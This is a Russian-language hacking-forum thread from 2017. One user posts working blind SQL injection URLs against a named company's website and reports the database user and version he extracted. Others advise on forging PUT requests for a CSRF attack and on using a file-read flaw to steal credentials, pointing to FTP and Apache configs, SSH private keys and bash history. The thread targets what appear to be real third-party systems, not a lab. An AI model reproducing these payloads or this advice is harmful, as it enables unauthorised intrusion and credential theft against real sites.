05.02.2017, 19:07
|
|
Познающий
Регистрация: 01.02.2007
Сообщений: 89
С нами:
10143707
Репутация:
114
|
|
Сообщение от Octavian
↑
В скулмап ктото засунет . интересно что он скажет
слепая скуля, потому вывода нет.
Код:
http://iucosoft.com/software-development-details.html?place=desktop%27%20AND%20substring(user(),8,1)=%27t
Код:
http://iucosoft.com/software-development-details.html?place=desktop%27%20AND%20substring(version(),7,1)=%27-
user() = iucosoft
version() = 5.5.40-(дальше не докрутил) в ручную подбирал с телефона
|
|
|
05.02.2017, 20:15
|
|
Постоянный
Регистрация: 18.03.2016
Сообщений: 663
С нами:
5344886
Репутация:
441
|
|
Сообщение от Elva
↑
Задача
Подделать PUT запрос с целью проведения CSRF атаки.
Токен скорее всего проверяется, но всякое бывает. Для отправки PUT можно воспользоваться Burp-ом, для проведения атаки XMLHttpRequest.
Сообщение от Elva
↑
2. Кто может помочь включить BeEF ?
Попробуй подробно написать на гитхабе https://github.com/beefproject/beef/issues, возможно помогут.
|
|
|
|
06.02.2017, 16:14
|
|
Новичок
Регистрация: 17.11.2011
Сообщений: 0
С нами:
7624406
Репутация:
-5
|
|
Что можно сделать с локальной читалкой в гете при условии что конфиг к бд php формата и прочитать его соответственно не получается? Можно что то такое прочитать, что помогло бы получить доступ?
|
|
|
|
06.02.2017, 17:32
|
|
Постоянный
Регистрация: 18.03.2016
Сообщений: 663
С нами:
5344886
Репутация:
441
|
|
Сообщение от Nikolaz
↑
Что можно сделать с локальной читалкой в гете при условии что конфиг к бд php формата и прочитать его соответственно не получается? Можно что то такое прочитать, что помогло бы получить доступ?
Может у тебя локальный инклуд?
|
|
|
|
06.02.2017, 19:38
|
|
Новичок
Регистрация: 17.11.2011
Сообщений: 0
С нами:
7624406
Репутация:
-5
|
|
Сообщение от crlf
↑
Может у тебя локальный инклуд?
У меня file_get_contents() а не include() . Читать ток могу
|
|
|
|
06.02.2017, 19:53
|
|
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
С нами:
7502006
Репутация:
90
|
|
Сообщение от Nikolaz
↑
У меня file_get_contents() а не include() . Читать ток могу
тогда php файлы должны читаться, может прав не хватать, index.php например читается?
|
|
|
|
06.02.2017, 20:15
|
|
Новичок
Регистрация: 17.11.2011
Сообщений: 0
С нами:
7624406
Репутация:
-5
|
|
Сообщение от t0ma5
↑
тогда php файлы должны читаться, может прав не хватать, index.php например читается?
Благодарю, не знал. Но прав не хватает... Нужны еще варианты помимо конфига от бд. Можно системное что нибудь прочитать что позволит получить доступ? Ссх клиент там, и прочую лабуду
|
|
|
|
06.02.2017, 20:23
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от Nikolaz
↑
Благодарю, не знал. Но прав не хватает... Нужны еще варианты помимо конфига от бд. Можно системное что нибудь прочитать что позволит получить доступ? Ссх клиент там, и прочую лабуду
ну для ssh пассы в открытом виде еще со времен мамонтов не было, попробуй файлы конфигов фтп, апача
|
|
|
|
06.02.2017, 20:25
|
|
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
С нами:
7502006
Репутация:
90
|
|
Сообщение от Gorev
↑
ну для ssh пассы в открытом виде еще со времен мамонто не было, попробуй файлы конфигов фтп, апача
иногда случается... недавно видел один хост, на котором из под www-data читались /home/user/.ssh/id_rsa /home/user/.bash_history
|
|
|
|
06.02.2017, 20:42
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от t0ma5
↑
иногда случается... недавно видел один хост, на котором из под www-data читались /home/user/.ssh/id_rsa /home/user/.bash_history
ну это крайне редкое исключение из правил, обычно из под www не большой выбор
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [aywo]](/avatars/avatar32504.jpg?4045218){kind=avatar}
Комбинированный вид
